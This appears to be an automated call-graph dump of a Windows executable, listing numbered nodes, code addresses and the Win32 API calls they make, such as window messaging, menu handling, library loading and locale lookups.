491d8e 52960->52962 53095 446f94 18 API calls 52961->53095 52965 491dca 52962->52965 52966 491d9d 52962->52966 52964 491d83 Sleep 53021 491dc5 52964->53021 52971 491dd9 52965->52971 52972 491e06 52965->52972 52967 446ff0 18 API calls 52966->52967 52970 491dac 52967->52970 52968 403420 4 API calls 52969 492238 52968->52969 52973 491db4 FindWindowA 52970->52973 52974 446ff0 18 API calls 52971->52974 52977 491e5c 52972->52977 52978 491e15 52972->52978 52976 447270 5 API calls 52973->52976 52975 491de6 52974->52975 52979 491dee FindWindowA 52975->52979 52976->53021 52983 491eb8 52977->52983 52984 491e6b 52977->52984 53096 446f94 18 API calls 52978->53096 52981 447270 5 API calls 52979->52981 53037 491e01 52981->53037 52982 491e21 53097 446f94 18 API calls 52982->53097 52990 491f14 52983->52990 52991 491ec7 52983->52991 53100 446f94 18 API calls 52984->53100 52987 491e2e 53098 446f94 18 API calls 52987->53098 52988 491e77 53101 446f94 18 API calls 52988->53101 53001 491f4e 52990->53001 53002 491f23 52990->53002 53105 446f94 18 API calls 52991->53105 52993 491e3b 53099 446f94 18 API calls 52993->53099 52995 491e84 53102 446f94 18 API calls 52995->53102 52997 491e46 SendMessageA 53000 447270 5 API calls 52997->53000 52998 491ed3 53106 446f94 18 API calls 52998->53106 53000->53037 53012 491f5d 53001->53012 53018 491f9c 53001->53018 53005 446ff0 18 API calls 53002->53005 53004 491e91 53103 446f94 18 API calls 53004->53103 53008 491f30 53005->53008 53006 491ee0 53107 446f94 18 API calls 53006->53107 53014 491f38 RegisterClipboardFormatA 53008->53014 53010 491e9c PostMessageA 53104 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53010->53104 53011 491eed 53108 446f94 18 API calls 53011->53108 53110 446f94 18 API calls 53012->53110 53017 447270 5 API calls 53014->53017 53017->53021 53022 491fab 53018->53022 53023 491ff0 53018->53023 53019 491ef8 SendNotifyMessageA 53109 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53019->53109 53020 491f69 53111 446f94 18 API calls 53020->53111 53021->52968 53113 446f94 18 API calls 53022->53113 53031 491fff 53023->53031 53032 492044 53023->53032 53026 491f76 53112 446f94 18 API calls 53026->53112 53029 491fb7 53114 446f94 18 API calls 53029->53114 53030 491f81 SendMessageA 53034 447270 5 API calls 53030->53034 53117 446f94 18 API calls 53031->53117 53040 492053 53032->53040 53041 4920a6 53032->53041 53034->53037 53036 491fc4 53115 446f94 18 API calls 53036->53115 53037->53021 53038 49200b 53118 446f94 18 API calls 53038->53118 53044 446ff0 18 API calls 53040->53044 53049 49212d 53041->53049 53050 4920b5 53041->53050 53043 491fcf PostMessageA 53116 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53043->53116 53047 492060 53044->53047 53045 492018 53119 446f94 18 API calls 53045->53119 53051 42e38c 2 API calls 53047->53051 53060 49213c 53049->53060 53061 492162 53049->53061 53053 446ff0 18 API calls 53050->53053 53054 49206d 53051->53054 53052 492023 SendNotifyMessageA 53120 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53052->53120 53056 4920c4 53053->53056 53057 492083 GetLastError 53054->53057 53058 492073 53054->53058 53121 446f94 18 API calls 53056->53121 53062 447270 5 API calls 53057->53062 53059 447270 5 API calls 53058->53059 53063 492081 53059->53063 53126 446f94 18 API calls 53060->53126 53068 492171 53061->53068 53069 492194 53061->53069 53062->53063 53067 447270 5 API calls 53063->53067 53066 492146 FreeLibrary 53127 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53066->53127 53067->53021 53072 446ff0 18 API calls 53068->53072 53078 4921a3 53069->53078 53084 4921d7 53069->53084 53070 4920d7 GetProcAddress 53073 49211d 53070->53073 53074 4920e3 53070->53074 53075 49217d 53072->53075 53125 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53073->53125 53122 446f94 18 API calls 53074->53122 53080 492185 CreateMutexA 53075->53080 53128 48c174 18 API calls 53078->53128 53079 4920ef 53123 446f94 18 API calls 53079->53123 53080->53021 53083 4920fc 53087 447270 5 API calls 53083->53087 53084->53021 53130 48c174 18 API calls 53084->53130 53086 4921af 53088 4921c0 OemToCharBuffA 53086->53088 53089 49210d 53087->53089 53129 48c18c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53088->53129 53124 4470c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53089->53124 53092 4921f2 53093 492203 CharToOemBuffA 53092->53093 53131 48c18c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 53093->53131 53095->52964 53096->52982 53097->52987 53098->52993 53099->52997 53100->52988 53101->52995 53102->53004 53103->53010 53104->53037 53105->52998 53106->53006 53107->53011 53108->53019 53109->53021 53110->53020 53111->53026 53112->53030 53113->53029 53114->53036 53115->53043 53116->53037 53117->53038 53118->53045 53119->53052 53120->53021 53121->53070 53122->53079 53123->53083 53124->53037 53125->53037 53126->53066 53127->53021 53128->53086 53129->53021 53130->53092 53131->53021 53132 41ee4c 53133 41ee91 53132->53133 53134 41ee5b IsWindowVisible 53132->53134 53134->53133 53135 41ee65 IsWindowEnabled 53134->53135 53135->53133 53136 41ee6f 53135->53136 53137 402648 4 API calls 53136->53137 53138 41ee79 EnableWindow 53137->53138 53138->53133 53139 41fb50 53140 41fb59 53139->53140 53143 41fdf4 53140->53143 53142 41fb66 53144 41fee6 53143->53144 53145 41fe0b 53143->53145 53144->53142 53145->53144 53164 41f9b4 GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53145->53164 53147 41fe41 53148 41fe45 53147->53148 53149 41fe6b 53147->53149 53165 41fb94 53148->53165 53174 41f9b4 GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53149->53174 53152 41fe79 53154 41fea3 53152->53154 53155 41fe7d 53152->53155 53158 41fb94 10 API calls 53154->53158 53157 41fb94 10 API calls 53155->53157 53156 41fb94 10 API calls 53163 41fe69 53156->53163 53159 41fe8f 53157->53159 53160 41feb5 53158->53160 53161 41fb94 10 API calls 53159->53161 53162 41fb94 10 API calls 53160->53162 53161->53163 53162->53163 53163->53142 53164->53147 53166 41fbaf 53165->53166 53167 41f934 4 API calls 53166->53167 53168 41fbc5 53166->53168 53167->53168 53175 41f934 53168->53175 53170 41fc0d 53171 41fc30 SetScrollInfo 53170->53171 53183 41fa94 53171->53183 53174->53152 53194 4181d8 53175->53194 53177 41f951 GetWindowLongA 53178 41f98e 53177->53178 53179 41f96e 53177->53179 53197 41f8c0 GetWindowLongA GetSystemMetrics GetSystemMetrics 53178->53197 53196 41f8c0 GetWindowLongA GetSystemMetrics GetSystemMetrics 53179->53196 53182 41f97a 53182->53170 53184 41faa2 53183->53184 53185 41faaa 53183->53185 53184->53156 53186 41fae9 53185->53186 53187 41fad9 53185->53187 53193 41fae7 53185->53193 53199 417e40 IsWindowVisible ScrollWindow SetWindowPos 53186->53199 53198 417e40 IsWindowVisible ScrollWindow SetWindowPos 53187->53198 53188 41fb29 GetScrollPos 53188->53184 53191 41fb34 53188->53191 53192 41fb43 SetScrollPos 53191->53192 53192->53184 53193->53188 53195 4181e2 53194->53195 53195->53177 53196->53182 53197->53182 53198->53193 53199->53193 53200 420590 53201 4205a3 53200->53201 53221 415b28 53201->53221 53203 4206ea 53204 420701 53203->53204 53228 4146cc KiUserCallbackDispatcher 53203->53228 53205 420718 53204->53205 53229 414710 KiUserCallbackDispatcher 53204->53229 53211 42073a 53205->53211 53230 420058 12 API calls 53205->53230 53206 4205de 53206->53203 53207 420649 53206->53207 53214 42063a MulDiv 53206->53214 53226 420840 20 API calls 53207->53226 53212 420662 53212->53203 53227 420058 12 API calls 53212->53227 53225 41a2fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue DeleteObject 53214->53225 53217 42067f 53218 42069b MulDiv 53217->53218 53219 4206be 53217->53219 53218->53219 53219->53203 53220 4206c7 MulDiv 53219->53220 53220->53203 53222 415b3a 53221->53222 53231 414468 53222->53231 53224 415b52 53224->53206 53225->53207 53226->53212 53227->53217 53228->53204 53229->53205 53230->53211 53232 414482 53231->53232 53235 410640 53232->53235 53234 414498 53234->53224 53238 40de8c 53235->53238 53237 410646 53237->53234 53239 40deee 53238->53239 53240 40de9f 53238->53240 53245 40defc 53239->53245 53243 40defc 19 API calls 53240->53243 53244 40dec9 53243->53244 53244->53237 53246 40df0c 53245->53246 53248 40df22 53246->53248 53257 40e284 53246->53257 53273 40d7c8 53246->53273 53276 40e134 53248->53276 53251 40d7c8 5 API calls 53252 40df2a 53251->53252 53252->53251 53253 40df96 53252->53253 53279 40dd48 53252->53279 53254 40e134 5 API calls 53253->53254 53256 40def8 53254->53256 53256->53237 53293 40eb54 53257->53293 53259 403778 4 API calls 53260 40e2bf 53259->53260 53260->53259 53261 40e375 53260->53261 53355 40d95c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53260->53355 53356 40e268 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53260->53356 53262 40e390 53261->53262 53263 40e39f 53261->53263 53302 40e5a8 53262->53302 53352 40bc0c 53263->53352 53269 40e39d 53270 403400 4 API calls 53269->53270 53271 40e444 53270->53271 53271->53246 53274 40ebf0 5 API calls 53273->53274 53275 40d7d2 53274->53275 53275->53246 53389 40d6a4 53276->53389 53398 40e13c 53279->53398 53282 40eb54 5 API calls 53283 40dd86 53282->53283 53284 40eb54 5 API calls 53283->53284 53285 40dd91 53284->53285 53286 40dda3 53285->53286 53287 40ddac 53285->53287 53292 40dda9 53285->53292 53408 40dcb0 19 API calls 53286->53408 53405 40dbc0 53287->53405 53290 403420 4 API calls 53291 40de77 53290->53291 53291->53252 53292->53290 53358 40d968 53293->53358 53296 4034e0 4 API calls 53297 40eb77 53296->53297 53298 403744 4 API calls 53297->53298 53299 40eb7e 53298->53299 53300 40d968 5 API calls 53299->53300 53301 40eb8c 53300->53301 53301->53260 53303 40e5d4 53302->53303 53304 40e5de 53302->53304 53363 40d628 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53303->53363 53306 40e620 53304->53306 53307 40e6c1 53304->53307 53308 40e651 53304->53308 53309 40e6a3 53304->53309 53310 40e6f9 53304->53310 53311 40e67d 53304->53311 53312 40e6de 53304->53312 53313 40e75e 53304->53313 53345 40e644 53304->53345 53364 40d94c 53306->53364 53374 40eb90 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53307->53374 53308->53345 53370 40da00 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53308->53370 53373 40dfcc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53309->53373 53314 40d94c 5 API calls 53310->53314 53371 40e00c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53311->53371 53376 40ea78 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53312->53376 53320 40d94c 5 API calls 53313->53320 53323 40e701 53314->53323 53316 403400 4 API calls 53324 40e7d3 53316->53324 53327 40e766 53320->53327 53331 40e70b 53323->53331 53339 40e705 53323->53339 53324->53269 53325 40e6cc 53375 409f20 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53325->53375 53326 40e688 53372 40d658 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53326->53372 53334 40e783 53327->53334 53335 40e76a 53327->53335 53329 40e649 53369 40e0c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53329->53369 53330 40e62c 53367 40e00c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53330->53367 53377 40ebf0 53331->53377 53383 40e00c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53334->53383 53342 40ebf0 5 API calls 53335->53342 53340 40e709 53339->53340 53344 40ebf0 5 API calls 53339->53344 53340->53345 53381 40e00c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53340->53381 53342->53345 53343 40e637 53368 40e454 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53343->53368 53348 40e72c 53344->53348 53345->53316 53380 40da88 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53348->53380 53349 40e74e 53382 40e4bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53349->53382 53384 40bbb8 53352->53384 53355->53260 53356->53260 53357 40d95c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53357->53269 53361 40d973 53358->53361 53359 40d9ad 53359->53296 53361->53359 53362 40d9b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53361->53362 53362->53361 53363->53304 53365 40ebf0 5 API calls 53364->53365 53366 40d956 53365->53366 53366->53329 53366->53330 53367->53343 53368->53345 53369->53308 53370->53345 53371->53326 53372->53345 53373->53345 53374->53325 53375->53345 53376->53345 53378 40d968 5 API calls 53377->53378 53379 40ebfd 53378->53379 53379->53345 53380->53340 53381->53349 53382->53345 53383->53345 53385 40bbca 53384->53385 53387 40bbef 53384->53387 53385->53387 53388 40bc6c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53385->53388 53387->53269 53387->53357 53388->53387 53390 40ebf0 5 API calls 53389->53390 53391 40d6b1 53390->53391 53392 40d6c4 53391->53392 53396 40ecf4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53391->53396 53392->53252 53394 40d6bf 53397 40d640 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53394->53397 53396->53394 53397->53392 53399 40d94c 5 API calls 53398->53399 53400 40e153 53399->53400 53401 40ebf0 5 API calls 53400->53401 53404 40dd7b 53400->53404 53402 40e160 53401->53402 53402->53404 53409 40e0c0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53402->53409 53404->53282 53410 40ad64 19 API calls 53405->53410 53407 40dbe8 53407->53292 53408->53292 53409->53404 53410->53407 53411 42f518 53412 42f523 53411->53412 53413 42f527 NtdllDefWindowProc_A 53411->53413 53413->53412 53414 4358d8 53415 4358ed 53414->53415 53419 435907 53415->53419 53420 4352c0 53415->53420 53424 4352f0 53420->53424 53430 43530a 53420->53430 53421 403400 4 API calls 53422 43570f 53421->53422 53422->53419 53433 435720 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53422->53433 53423 446d9c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53423->53424 53424->53423 53425 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53424->53425 53426 402648 4 API calls 53424->53426 53427 431c98 4 API calls 53424->53427 53428 4038a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53424->53428 53424->53430 53431 403744 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53424->53431 53434 4343a8 53424->53434 53446 434b6c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53424->53446 53425->53424 53426->53424 53427->53424 53428->53424 53430->53421 53431->53424 53433->53419 53435 434465 53434->53435 53436 4343d5 53434->53436 53465 434308 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53435->53465 53438 403494 4 API calls 53436->53438 53439 4343e3 53438->53439 53440 403778 4 API calls 53439->53440 53444 434404 53440->53444 53441 403400 4 API calls 53442 4344b5 53441->53442 53442->53424 53443 434457 53443->53441 53444->53443 53447 493e50 53444->53447 53446->53424 53448 493e88 53447->53448 53449 493f20 53447->53449 53450 403494 4 API calls 53448->53450 53466 448928 53449->53466 53454 493e93 53450->53454 53452 403400 4 API calls 53453 493f44 53452->53453 53455 403400 4 API calls 53453->53455 53456 4037b8 4 API calls 53454->53456 53458 493ea3 53454->53458 53457 493f4c 53455->53457 53459 493ebc 53456->53459 53457->53444 53458->53452 53459->53458 53460 4037b8 4 API calls 53459->53460 53461 493edf 53460->53461 53462 403778 4 API calls 53461->53462 53463 493f10 53462->53463 53464 403634 4 API calls 53463->53464 53464->53449 53465->53443 53467 44894d 53466->53467 53468 448990 53466->53468 53469 403494 4 API calls 53467->53469 53471 4489a4 53468->53471 53478 448524 53468->53478 53470 448958 53469->53470 53475 4037b8 4 API calls 53470->53475 53473 403400 4 API calls 53471->53473 53474 4489d7 53473->53474 53474->53458 53476 448974 53475->53476 53477 4037b8 4 API calls 53476->53477 53477->53468 53479 403494 4 API calls 53478->53479 53480 44855a 53479->53480 53481 4037b8 4 API calls 53480->53481 53482 44856c 53481->53482 53483 403778 4 API calls 53482->53483 53484 44858d 53483->53484 53485 4037b8 4 API calls 53484->53485 53486 4485a5 53485->53486 53487 403778 4 API calls 53486->53487 53488 4485d0 53487->53488 53489 4037b8 4 API calls 53488->53489 53500 4485e8 53489->53500 53490 448620 53492 403420 4 API calls 53490->53492 53491 4486bb 53494 4486c3 GetProcAddress 53491->53494 53495 448700 53492->53495 53493 448655 LoadLibraryA 53493->53500 53497 4486d6 53494->53497 53495->53471 53496 448643 LoadLibraryExA 53496->53500 53497->53490 53498 403b80 4 API calls 53498->53500 53499 403450 4 API calls 53499->53500 53500->53490 53500->53491 53500->53493 53500->53496 53500->53498 53500->53499 53502 43da80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53500->53502 53502->53500 53503 40ce1c 53506 406f00 WriteFile 53503->53506 53507 406f1d 53506->53507 53508 4222dc 53509 4222eb 53508->53509 53514 42126c 53509->53514 53512 42230b 53515 4212db 53514->53515 53529 42127b 53514->53529 53518 4212ec 53515->53518 53539 4124c8 GetMenuItemCount GetMenuStringA GetMenuState 53515->53539 53517 42131a 53521 42138d 53517->53521 53526 421335 53517->53526 53518->53517 53520 4213b2 53518->53520 53519 42138b 53522 4213de 53519->53522 53541 421e24 11 API calls 53519->53541 53520->53519 53524 4213c6 SetMenu 53520->53524 53521->53519 53528 4213a1 53521->53528 53542 4211b4 10 API calls 53522->53542 53524->53519 53526->53519 53532 421358 GetMenu 53526->53532 53527 4213e5 53527->53512 53537 4221e0 10 API calls 53527->53537 53531 4213aa SetMenu 53528->53531 53529->53515 53538 408d1c 19 API calls 53529->53538 53531->53519 53533 421362 53532->53533 53534 42137b 53532->53534 53536 421375 SetMenu 53533->53536 53540 4124c8 GetMenuItemCount GetMenuStringA GetMenuState 53534->53540 53536->53534 53537->53512 53538->53529 53539->53518 53540->53519 53541->53522 53542->53527 53543 40d064 53544 40d06c 53543->53544 53545 40d096 53544->53545 53546 40d09a 53544->53546 53547 40d08f 53544->53547 53549 40d0b0 53546->53549 53550 40d09e 53546->53550 53556 406288 GlobalHandle GlobalUnlock GlobalFree 53547->53556 53557 40626c GlobalHandle GlobalUnlock GlobalReAlloc GlobalLock 53549->53557 53555 40625c GlobalAlloc GlobalLock 53550->53555 53553 40d0ac 53553->53545 53554 408cac 5 API calls 53553->53554 53554->53545 53555->53553 53556->53545 53557->53553 53558 44b4a0 53559 44b4ae 53558->53559 53561 44b4cd 53558->53561 53559->53561 53562 44b384 53559->53562 53563 44b3b7 53562->53563 53573 414ae0 53563->53573 53565 44b3ca 53566 44b3f7 73A1A570 53565->53566 53567 40357c 4 API calls 53565->53567 53568 41a1e0 5 API calls 53566->53568 53567->53566 53569 44b417 SelectObject 53568->53569 53570 44b428 53569->53570 53577 44b0b8 53570->53577 53572 44b43c 73A1A480 53572->53561 53574 414aee 53573->53574 53575 4034e0 4 API calls 53574->53575 53576 414afb 53575->53576 53576->53565 53578 44b0cf 53577->53578 53579 44b162 53578->53579 53580 44b0e2 53578->53580 53581 44b14b 53578->53581 53579->53572 53580->53579 53583 402648 4 API calls 53580->53583 53582 44b15b DrawTextA 53581->53582 53582->53579 53584 44b0f3 53583->53584 53585 44b111 MultiByteToWideChar DrawTextW 53584->53585 53586 402660 4 API calls 53585->53586 53587 44b143 53586->53587 53587->53572 53588 448720 53589 448755 53588->53589 53590 44874e 53588->53590 53591 448769 53589->53591 53592 448524 7 API calls 53589->53592 53594 403400 4 API calls 53590->53594 53591->53590 53593 403494 4 API calls 53591->53593 53592->53591 53596 448782 53593->53596 53595 4488ff 53594->53595 53597 4037b8 4 API calls 53596->53597 53598 44879e 53597->53598 53599 4037b8 4 API calls 53598->53599 53600 4487ba 53599->53600 53600->53590 53601 4487ce 53600->53601 53602 4037b8 4 API calls 53601->53602 53603 4487e8 53602->53603 53604 431bc8 4 API calls 53603->53604 53605 44880a 53604->53605 53606 431c98 4 API calls 53605->53606 53613 44882a 53605->53613 53606->53605 53607 448880 53620 44232c 53607->53620 53608 448868 53608->53607 53632 4435c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53608->53632 53612 4488b4 GetLastError 53633 4484b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53612->53633 53613->53608 53631 4435c8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53613->53631 53615 4488c3 53634 443608 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53615->53634 53617 4488d8 53635 443618 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53617->53635 53619 4488e0 53621 442365 53620->53621 53622 44330a 53620->53622 53623 403400 4 API calls 53621->53623 53624 403400 4 API calls 53622->53624 53625 44236d 53623->53625 53626 44331f 53624->53626 53627 431bc8 4 API calls 53625->53627 53626->53612 53629 442379 53627->53629 53628 4432fa 53628->53612 53629->53628 53636 441a04 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53629->53636 53631->53613 53632->53607 53633->53615 53634->53617 53635->53619 53636->53629 53637 4165e4 73A25CF0 53638 42e3e7 SetErrorMode 53639 40cee8 53640 40cef5 53639->53640 53641 40cefa 53639->53641 53643 406f38 CloseHandle 53640->53643 53643->53641 53644 47ff68 53649 450fd8 53644->53649 53646 47ff7c 53659 47f054 53646->53659 53648 47ffa0 53650 450fe5 53649->53650 53652 451039 53650->53652 53668 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53650->53668 53665 450e5c 53652->53665 53656 451061 53658 4510a4 53656->53658 53670 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53656->53670 53658->53646 53675 40b5b0 53659->53675 53661 47f0c1 53661->53648 53663 47f076 53663->53661 53679 4069cc 53663->53679 53682 476428 53663->53682 53671 450e08 53665->53671 53668->53652 53669 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53669->53656 53670->53658 53672 450e2b 53671->53672 53673 450e1a 53671->53673 53672->53656 53672->53669 53674 450e1f InterlockedExchange 53673->53674 53674->53672 53676 40b5bb 53675->53676 53677 40b5db 53676->53677 53698 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53676->53698 53677->53663 53680 402648 4 API calls 53679->53680 53681 4069d7 53680->53681 53681->53663 53695 476459 53682->53695 53696 4764a2 53682->53696 53683 4764ed 53699 451268 53683->53699 53684 451268 21 API calls 53684->53695 53686 476504 53688 403420 4 API calls 53686->53688 53687 4038a4 4 API calls 53687->53695 53690 47651e 53688->53690 53689 4038a4 4 API calls 53689->53696 53690->53663 53691 403744 4 API calls 53691->53695 53692 403450 4 API calls 53692->53695 53693 403744 4 API calls 53693->53696 53694 403450 4 API calls 53694->53696 53695->53684 53695->53687 53695->53691 53695->53692 53695->53696 53696->53683 53696->53689 53696->53693 53696->53694 53697 451268 21 API calls 53696->53697 53697->53696 53698->53677 53700 451283 53699->53700 53701 451278 53699->53701 53705 45120c 21 API calls 53700->53705 53701->53686 53703 45128e 53703->53701 53706 408bfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53703->53706 53705->53703 53706->53701 53707 413634 SetWindowLongA GetWindowLongA 53708 413691 SetPropA SetPropA 53707->53708 53709 413673 GetWindowLongA 53707->53709 53714 41f394 53708->53714 53709->53708 53710 413682 SetWindowLongA 53709->53710 53710->53708 53719 423c04 53714->53719 53813 423a7c 53714->53813 53820 415268 53714->53820 53715 4136e1 53724 423c3a 53719->53724 53722 423ce4 53725 423ceb 53722->53725 53726 423d1f 53722->53726 53723 423c85 53727 423c8b 53723->53727 53728 423d48 53723->53728 53740 423c5b 53724->53740 53827 423b60 53724->53827 53729 423cf1 53725->53729 53773 423fa9 53725->53773 53732 424092 IsIconic 53726->53732 53733 423d2a 53726->53733 53730 423c90 53727->53730 53731 423cbd 53727->53731 53734 423d63 53728->53734 53735 423d5a 53728->53735 53737 423f0b SendMessageA 53729->53737 53738 423cff 53729->53738 53741 423c96 53730->53741 53742 423dee 53730->53742 53731->53740 53762 423cd6 53731->53762 53763 423e37 53731->53763 53739 4240a6 GetFocus 53732->53739 53732->53740 53743 423d33 53733->53743 53744 4240ce 53733->53744 53836 42418c 11 API calls 53734->53836 53745 423d70 53735->53745 53746 423d61 53735->53746 53737->53740 53738->53740 53765 423cb8 53738->53765 53793 423f4e 53738->53793 53739->53740 53750 4240b7 53739->53750 53740->53715 53751 423e16 PostMessageA 53741->53751 53752 423c9f 53741->53752 53849 423b7c NtdllDefWindowProc_A 53742->53849 53748 4240e5 53743->53748 53743->53765 53869 424848 WinHelpA PostMessageA 53744->53869 53837 4241d4 IsIconic 53745->53837 53845 423b7c NtdllDefWindowProc_A 53746->53845 53760 424103 53748->53760 53761 4240ee 53748->53761 53868 41efec GetCurrentThreadId 73A25940 53750->53868 53855 423b7c NtdllDefWindowProc_A 53751->53855 53757 423ca8 53752->53757 53758 423e9d 53752->53758 53768 423cb1 53757->53768 53769 423dc6 IsIconic 53757->53769 53770 423ea6 53758->53770 53771 423ed7 53758->53771 53759 423e31 53759->53740 53876 424524 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 53760->53876 53870 4244cc 53761->53870 53762->53765 53774 423e03 53762->53774 53831 423b7c NtdllDefWindowProc_A 53763->53831 53765->53740 53835 423b7c NtdllDefWindowProc_A 53765->53835 53767 4240be 53767->53740 53781 4240c6 SetFocus 53767->53781 53768->53765 53782 423d89 53768->53782 53775 423de2 53769->53775 53776 423dd6 53769->53776 53857 423b0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 53770->53857 53832 423b7c NtdllDefWindowProc_A 53771->53832 53773->53740 53784 423fcf IsWindowEnabled 53773->53784 53850 424170 53774->53850 53848 423b7c NtdllDefWindowProc_A 53775->53848 53847 423bb8 15 API calls 53776->53847 53780 423e3d 53788 423e7b 53780->53788 53789 423e59 53780->53789 53781->53740 53782->53740 53846 422c44 ShowWindow PostMessageA PostQuitMessage 53782->53846 53784->53740 53791 423fdd 53784->53791 53787 423edd 53792 423ef5 53787->53792 53833 41ee9c GetCurrentThreadId 73A25940 53787->53833 53795 423a7c 6 API calls 53788->53795 53856 423b0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 53789->53856 53790 423eae 53797 423ec0 53790->53797 53858 41ef50 53790->53858 53805 423fe4 IsWindowVisible 53791->53805 53800 423a7c 6 API calls 53792->53800 53793->53740 53801 423f70 IsWindowEnabled 53793->53801 53803 423e83 PostMessageA 53795->53803 53864 423b7c NtdllDefWindowProc_A 53797->53864 53800->53740 53801->53740 53806 423f7e 53801->53806 53802 423e61 PostMessageA 53802->53740 53803->53740 53805->53740 53807 423ff2 GetFocus 53805->53807 53865 412308 7 API calls 53806->53865 53809 4181d8 53807->53809 53810 424007 SetFocus 53809->53810 53866 415238 53810->53866 53814 423b05 53813->53814 53815 423a8c 53813->53815 53814->53715 53815->53814 53816 423a92 EnumWindows 53815->53816 53816->53814 53817 423aae GetWindow GetWindowLongA 53816->53817 53968 423a14 GetWindow 53816->53968 53818 423acd 53817->53818 53818->53814 53819 423af9 SetWindowPos 53818->53819 53819->53814 53819->53818 53821 415275 53820->53821 53822 4152d0 53821->53822 53823 4152db 53821->53823 53826 4152d9 53821->53826 53822->53826 53972 415054 46 API calls 53822->53972 53971 424b84 13 API calls 53823->53971 53826->53715 53828 423b75 53827->53828 53829 423b6a 53827->53829 53828->53722 53828->53723 53829->53828 53877 408710 GetSystemDefaultLCID 53829->53877 53831->53780 53832->53787 53834 41ef21 53833->53834 53834->53792 53835->53740 53836->53740 53838 42421b 53837->53838 53839 4241e5 SetActiveWindow 53837->53839 53838->53740 53940 423644 53839->53940 53843 424202 53843->53838 53844 424215 SetFocus 53843->53844 53844->53838 53845->53740 53846->53740 53847->53740 53848->53740 53849->53740 53953 41db28 53850->53953 53853 424188 53853->53740 53854 42417c LoadIconA 53854->53853 53855->53759 53856->53802 53857->53790 53859 41ef84 53858->53859 53860 41ef58 IsWindow 53858->53860 53859->53797 53861 41ef67 EnableWindow 53860->53861 53863 41ef72 53860->53863 53861->53863 53862 402660 4 API calls 53862->53863 53863->53859 53863->53860 53863->53862 53864->53740 53865->53740 53867 415253 SetFocus 53866->53867 53867->53740 53868->53767 53869->53759 53871 4244f2 53870->53871 53872 4244d8 53870->53872 53875 402648 4 API calls 53871->53875 53873 424507 53872->53873 53874 4244df SendMessageA 53872->53874 53873->53740 53874->53873 53875->53873 53876->53759 53932 408558 GetLocaleInfoA 53877->53932 53880 403450 4 API calls 53881 408750 53880->53881 53882 408558 5 API calls 53881->53882 53883 408765 53882->53883 53884 408558 5 API calls 53883->53884 53885 408789 53884->53885 53938 4085a4 GetLocaleInfoA 53885->53938 53888 4085a4 GetLocaleInfoA 53889 4087b9 53888->53889 53890 408558 5 API calls 53889->53890 53891 4087d3 53890->53891 53892 4085a4 GetLocaleInfoA 53891->53892 53893 4087f0 53892->53893 53894 408558 5 API calls 53893->53894 53895 40880a 53894->53895 53896 403450 4 API calls 53895->53896 53897 408817 53896->53897 53898 408558 5 API calls 53897->53898 53899 40882c 53898->53899 53900 403450 4 API calls 53899->53900 53901 408839 53900->53901 53902 4085a4 GetLocaleInfoA 53901->53902 53903 408847 53902->53903 53904 408558 5 API calls 53903->53904 53905 408861 53904->53905 53906 403450 4 API calls 53905->53906 53907 40886e 53906->53907 53908 408558 5 API calls 